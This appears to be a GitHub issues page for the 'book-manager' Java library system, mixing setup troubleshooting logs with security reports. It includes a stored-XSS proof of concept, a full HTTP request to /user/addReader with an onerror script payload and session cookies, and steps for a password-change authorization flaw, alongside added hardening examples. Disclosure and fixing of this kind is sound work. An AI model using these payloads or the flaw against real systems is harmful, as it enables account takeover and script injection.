lovebuildj / book-manager

JavaWeb library management system: simple and easy to use, powerful, highly extensible, and integrates mainstream frameworks

License: MIT License

Java 82.66% HTML 17.34%
java springboot

book-manager's Issues

book-manager v1.0.3-Change User Password Vulnerability

Log in as admin, create an account test which is not admin, then log in with test. In the reader page, account test can change any user's password by modifying user information.
image
image

Change admin's password; then admin cannot log in with the old password.
image
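
The report above describes a non-admin account changing other users' passwords through the user-information update. The following added example (not book-manager's code; every class, field and method name is hypothetical) contrasts a handler that trusts the user id in the request body with one that authorizes the change against the server-side session user.

```java
import java.security.GeneralSecurityException;
import java.security.SecureRandom;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;

// Added illustration: all names here are hypothetical, not taken from book-manager's source.
public class PasswordChangeGuard {

    static final class User {
        final int id;
        final String username;
        final boolean admin;
        String passwordHash;

        User(int id, String username, boolean admin) {
            this.id = id;
            this.username = username;
            this.admin = admin;
        }
    }

    private final Map<Integer, User> users = new HashMap<>();

    User register(int id, String username, boolean admin, String password) {
        User u = new User(id, username, admin);
        u.passwordHash = hash(password);
        users.put(id, u);
        return u;
    }

    /** Vulnerable shape: the target id comes from the request body and the caller is never checked. */
    boolean changePasswordUnchecked(int targetIdFromBody, String newPassword) {
        User target = users.get(targetIdFromBody);
        if (target == null) return false;
        target.passwordHash = hash(newPassword);
        return true;
    }

    /** Hardened shape: the caller is the server-side session user and is checked against the target. */
    boolean changePassword(User caller, int targetIdFromBody, String newPassword) {
        User target = users.get(targetIdFromBody);
        if (caller == null || target == null) return false;
        boolean self = caller.id == target.id;
        if (!self && !caller.admin) return false; // non-admins may only change their own record
        target.passwordHash = hash(newPassword);
        return true;
    }

    /** Salted PBKDF2 so the demo stores no plaintext; a real app would use its configured encoder. */
    static String hash(String password) {
        try {
            byte[] salt = new byte[16];
            new SecureRandom().nextBytes(salt);
            PBEKeySpec spec = new PBEKeySpec(password.toCharArray(), salt, 210_000, 256);
            byte[] dk = SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256")
                    .generateSecret(spec).getEncoded();
            Base64.Encoder b64 = Base64.getEncoder();
            return b64.encodeToString(salt) + ":" + b64.encodeToString(dk);
        } catch (GeneralSecurityException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        PasswordChangeGuard svc = new PasswordChangeGuard();
        User admin = svc.register(1, "admin", true, "constructed-admin-pw"); // constructed sample data
        User test = svc.register(2, "test", false, "constructed-test-pw");

        String before = admin.passwordHash;
        boolean denied = !svc.changePassword(test, admin.id, "constructed-new-pw");
        System.out.println("test -> admin denied: " + denied
                + ", admin hash unchanged: " + before.equals(admin.passwordHash));
        System.out.println("test -> test allowed: " + svc.changePassword(test, test.id, "constructed-new-pw"));
        System.out.println("admin -> test allowed: " + svc.changePassword(admin, test.id, "constructed-reset-pw"));
        System.out.println("unchecked handler, body id=1: " + svc.changePasswordUnchecked(admin.id, "constructed-new-pw"));
    }
}
```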

Why do I always get a 404 on startup after setting everything up? Could you give me some pointers?

IDEA:2021.3.3
Tomcat:9.0.38
JDK:1.8.0_181
Maven:3.8.1
OS: Windows 10 Pro for Workstations 19044.1200
MySQL:8.0.28

Opened in the browser:

HTTP状态 404 - 未找到
类型 状态报告

消息 请求的资源[/manager_war_exploded/]不可用

描述 源服务器未能找到目标资源的表示或者是不愿公开一个已经存在的资源表示。

Apache Tomcat/9.0.38

Tomcat log:

"D:\Program Files\apache-tomcat-9.0.38\bin\catalina.bat" run
[2022-03-28 10:16:56,535] 工件 manager:war exploded: 正在等待服务器连接以启动工件部署…
Using CATALINA_BASE:   "C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a"
Using CATALINA_HOME:   "D:\Program Files\apache-tomcat-9.0.38"
Using CATALINA_TMPDIR: "D:\Program Files\apache-tomcat-9.0.38\temp"
Using JRE_HOME:        "D:\Program Files\Java\jdk1.8.0_181"
Using CLASSPATH:       "D:\Program Files\apache-tomcat-9.0.38\bin\bootstrap.jar;D:\Program Files\apache-tomcat-9.0.38\bin\tomcat-juli.jar"
Using CATALINA_OPTS:   ""
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.服务器版本: Apache Tomcat/9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器构建:        Sep 10 2020 08:20:30 UTC
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器版本号(:     9.0.38.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 操作系统名称:      Windows 10
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS.版本:           10.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 架构:              amd64
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java 环境变量:     D:\Program Files\Java\jdk1.8.0_181\jre
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java虚拟机版本:    1.8.0_181-b13
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM.供应商:        Oracle Corporation
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:     C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:     D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.config.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\conf\logging.properties
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.port=1099
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.ssl=false
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.password.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.password
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.access.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.access
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.rmi.server.hostname=127.0.0.1
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djdk.tls.ephemeralDHKeySize=2048
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.protocol.handler.pkgs=org.apache.catalina.webresources
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dignore.endorsed.dirs=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.base=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.home=D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.io.tmpdir=D:\Program Files\apache-tomcat-9.0.38\temp
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent 使用APR版本[1.7.0]加载了基于APR的Apache Tomcat本机库[1.2.25]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR功能:IPv6[true]、sendfile[true]、accept filters[false]、random[true]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR/OpenSSL配置:useAprConnector[false],useOpenSSL[true]
28-Mar-2022 10:16:58.090 信息 [main] org.apache.catalina.core.AprLifecycleListener.initializeSSL OpenSSL成功初始化 [OpenSSL 1.1.1g  21 Apr 2020]
28-Mar-2022 10:16:58.574 信息 [main] org.apache.coyote.AbstractProtocol.init 初始化协议处理器 ["http-nio-8080"]
28-Mar-2022 10:16:58.621 信息 [main] org.apache.catalina.startup.Catalina.load 服务器在[1013]毫秒内初始化
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardService.startInternal 正在启动服务[Catalina]
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardEngine.startInternal 正在启动 Servlet 引擎:[Apache Tomcat/9.0.38]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.coyote.AbstractProtocol.start 开始协议处理句柄["http-nio-8080"]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.catalina.startup.Catalina.start [84]毫秒后服务器启动
已连接到服务器
[2022-03-28 10:16:58,887] 工件 manager:war exploded: 正在部署工件,请稍候…
28-Mar-2022 10:17:08.722 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [D:\Program Files\apache-tomcat-9.0.38\webapps\manager]
28-Mar-2022 10:17:08.878 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[D:\Program Files\apache-tomcat-9.0.38\webapps\manager]的部署已在[156]毫秒内完成
28-Mar-2022 10:17:08.987 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars 至少有一个JAR被扫描用于TLD但尚未包含TLD。 为此记录器启用调试日志记录,以获取已扫描但未在其中找到TLD的完整JAR列表。 在扫描期间跳过不需要的JAR可以缩短启动时间和JSP编译时间。
[2022-03-28 10:17:09,128] 工件 manager:war exploded: 工件已成功部署
[2022-03-28 10:17:09,128] 工件 manager:war exploded: 部署已花费 10,241 毫秒

Tomcat Localhost log:

28-Mar-2022 10:17:09.128 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.catalina.core.ApplicationContext.log 1 Spring WebApplicationInitializers detected on classpath

Tomcat Catalina log:

28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Server.服务器版本: Apache Tomcat/9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器构建:        Sep 10 2020 08:20:30 UTC
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 服务器版本号(:     9.0.38.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 操作系统名称:      Windows 10
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log OS.版本:           10.0
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 架构:              amd64
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java 环境变量:     D:\Program Files\Java\jdk1.8.0_181\jre
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log Java虚拟机版本:    1.8.0_181-b13
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log JVM.供应商:        Oracle Corporation
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_BASE:     C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log CATALINA_HOME:     D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.config.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\conf\logging.properties
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.port=1099
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.ssl=false
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.password.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.password
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcom.sun.management.jmxremote.access.file=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a\jmxremote.access
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.rmi.server.hostname=127.0.0.1
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djdk.tls.ephemeralDHKeySize=2048
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.protocol.handler.pkgs=org.apache.catalina.webresources
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dignore.endorsed.dirs=
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.base=C:\Users\LKurococ\AppData\Local\JetBrains\IntelliJIdea2021.3\tomcat\387116d8-cc9f-42e8-9842-89b1a700e10a
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Dcatalina.home=D:\Program Files\apache-tomcat-9.0.38
28-Mar-2022 10:16:57.996 信息 [main] org.apache.catalina.startup.VersionLoggerListener.log 命令行参数:-Djava.io.tmpdir=D:\Program Files\apache-tomcat-9.0.38\temp
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent 使用APR版本[1.7.0]加载了基于APR的Apache Tomcat本机库[1.2.25]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR功能:IPv6[true]、sendfile[true]、accept filters[false]、random[true]。
28-Mar-2022 10:16:58.043 信息 [main] org.apache.catalina.core.AprLifecycleListener.lifecycleEvent APR/OpenSSL配置:useAprConnector[false],useOpenSSL[true]
28-Mar-2022 10:16:58.090 信息 [main] org.apache.catalina.core.AprLifecycleListener.initializeSSL OpenSSL成功初始化 [OpenSSL 1.1.1g  21 Apr 2020]
28-Mar-2022 10:16:58.574 信息 [main] org.apache.coyote.AbstractProtocol.init 初始化协议处理器 ["http-nio-8080"]
28-Mar-2022 10:16:58.621 信息 [main] org.apache.catalina.startup.Catalina.load 服务器在[1013]毫秒内初始化
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardService.startInternal 正在启动服务[Catalina]
28-Mar-2022 10:16:58.684 信息 [main] org.apache.catalina.core.StandardEngine.startInternal 正在启动 Servlet 引擎:[Apache Tomcat/9.0.38]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.coyote.AbstractProtocol.start 开始协议处理句柄["http-nio-8080"]
28-Mar-2022 10:16:58.699 信息 [main] org.apache.catalina.startup.Catalina.start [84]毫秒后服务器启动
28-Mar-2022 10:17:08.722 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory 把web 应用程序部署到目录 [D:\Program Files\apache-tomcat-9.0.38\webapps\manager]
28-Mar-2022 10:17:08.878 信息 [Catalina-utility-1] org.apache.catalina.startup.HostConfig.deployDirectory Web应用程序目录[D:\Program Files\apache-tomcat-9.0.38\webapps\manager]的部署已在[156]毫秒内完成
28-Mar-2022 10:17:08.987 信息 [RMI TCP Connection(4)-127.0.0.1] org.apache.jasper.servlet.TldScanner.scanJars 至少有一个JAR被扫描用于TLD但尚未包含TLD。 为此记录器启用调试日志记录,以获取已扫描但未在其中找到TLD的完整JAR列表。 在扫描期间跳过不需要的JAR可以缩短启动时间和JSP编译时间。

Add reader has a stored XSS vulnerability

Use Fiddler to mock a request to add a reader:

image

Then the "xss2" message popup appears on the reader list page:
image

The PoC is:

```
POST http://localhost:8080/user/addReader
Host: localhost:8080
Connection: keep-alive
Content-Length: 165
sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"
Accept: */*
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/reader/reader-add
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: remember-me=YWRtaW46MTY4MDAxMTIyNDI0OTozODUzZDZkM2ExOWM5ZGFjZjQxMTljODBhMDhiNTU4Yw; JSESSIONID=E6CB8F800264AE98BAED6BFC9195E0FC
```

Request Body

```
{"nickname":"<img src=1 onerror=alert(\"xss2\") />","username":"test001","password":"123456","birthday":"","tel":"","email":"","address":"","size":"","identity":"2"}
```
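
The stored nickname in the report above executes because it reaches the reader list page as markup. The following added example (not book-manager's code; the class and method names and the table-row layout are assumptions) shows the same nickname rendered with and without HTML output encoding.

```java
// Added illustration: names and the row layout are hypothetical, not taken from book-manager's source.
public class ReaderListEncoding {

    /** Encode untrusted text for HTML element content and quoted attribute values. */
    static String escapeHtml(String s) {
        if (s == null) return "";
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Vulnerable shape: stored fields are concatenated into the page as markup. */
    static String rowUnsafe(String nickname, String username) {
        return "<tr><td>" + nickname + "</td><td>" + username + "</td></tr>";
    }

    /** Hardened shape: every stored field is encoded at the point of output. */
    static String rowEncoded(String nickname, String username) {
        return "<tr><td>" + escapeHtml(nickname) + "</td><td>" + escapeHtml(username) + "</td></tr>";
    }

    public static void main(String[] args) {
        // Nickname and username as stored by the request in the report.
        String nickname = "<img src=1 onerror=alert(\"xss2\") />";
        String username = "test001";

        String unsafe = rowUnsafe(nickname, username);
        String encoded = rowEncoded(nickname, username);
        System.out.println("unsafe : " + unsafe);
        System.out.println("encoded: " + encoded);

        // The encoded row must contain no tag opened by the stored value.
        if (encoded.contains("<img")) {
            throw new AssertionError("nickname reached the page as markup");
        }

        // Constructed benign value: legitimate punctuation survives as text.
        System.out.println("benign : " + rowEncoded("Tom & Jerry's \"Books\"", "reader01"));
    }
}
```

Encoding at output, rather than rejecting input at `addReader`, also covers nicknames that were stored before the fix.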

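Maven mirror repository problem

Which Maven mirror repository do you use? I am using the Aliyun mirror, but it does not seem to have spring-boot-starter-parent 2.3.1-RELEASE. Could you share your setting.xml file?

Error occurred during login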

Hibernate: select users0_.id as id1_2_, users0_.address as address2_2_, users0_.avatar as avatar3_2_, users0_.birthday as birthday4_2_, users0_.email as email5_2_, users0_.identity as identity6_2_, users0_.is_admin as is_admin7_2_, users0_.nickname as nickname8_2_, users0_.password as password9_2_, users0_.size as size10_2_, users0_.tel as tel11_2_, users0_.username as usernam12_2_ from users users0_ where users0_.username=?
2020-10-09 14:35:42.095 ERROR 8112 --- [nio-8080-exec-1] w.a.UsernamePasswordAuthenticationFilter : An internal error occurred while trying to authenticate the user.

org.springframework.security.authentication.InternalAuthenticationServiceException: null
	at org.springframework.security.authentication.dao.DaoAuthenticationProvider.retrieveUser(DaoAuthenticationProvider.java:123) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.authentication.dao.AbstractUserDetailsAuthenticationProvider.authenticate(AbstractUserDetailsAuthenticationProvider.java:144) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:199) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.authentication.ProviderManager.authenticate(ProviderManager.java:219) ~[spring-security-core-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.authentication.UsernamePasswordAuthenticationFilter.attemptAuthentication(UsernamePasswordAuthenticationFilter.java:95) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.authentication.AbstractAuthenticationProcessingFilter.doFilter(AbstractAuthenticationProcessingFilter.java:212) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.authentication.logout.LogoutFilter.doFilter(LogoutFilter.java:116) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.header.HeaderWriterFilter.doHeadersAfter(HeaderWriterFilter.java:92) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.header.HeaderWriterFilter.doFilterInternal(HeaderWriterFilter.java:77) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.context.SecurityContextPersistenceFilter.doFilter(SecurityContextPersistenceFilter.java:105) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.context.request.async.WebAsyncManagerIntegrationFilter.doFilterInternal(WebAsyncManagerIntegrationFilter.java:56) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.security.web.FilterChainProxy$VirtualFilterChain.doFilter(FilterChainProxy.java:334) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.FilterChainProxy.doFilterInternal(FilterChainProxy.java:215) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.security.web.FilterChainProxy.doFilter(FilterChainProxy.java:178) ~[spring-security-web-5.3.3.RELEASE.jar:5.3.3.RELEASE]
	at org.springframework.web.filter.DelegatingFilterProxy.invokeDelegate(DelegatingFilterProxy.java:358) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.web.filter.DelegatingFilterProxy.doFilter(DelegatingFilterProxy.java:271) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:100) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:93) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:201) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) ~[spring-web-5.2.7.RELEASE.jar:5.2.7.RELEASE]
	at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:541) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:373) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:868) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1590) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1130) ~[na:na]
	at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:630) ~[na:na]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-9.0.36.jar:9.0.36]
	at java.base/java.lang.Thread.run(Thread.java:832) ~[na:na]
Caused by: java.lang.NullPointerException: null
	at com.book.manager.service.UserService.loadUserByUsername(UserService.java:109) ~[classes/:na]
	at com.book.manager.service.UserService$$FastClassBySpringCGLIB$$11192418.invoke(<generated>) ~[classes/:na]
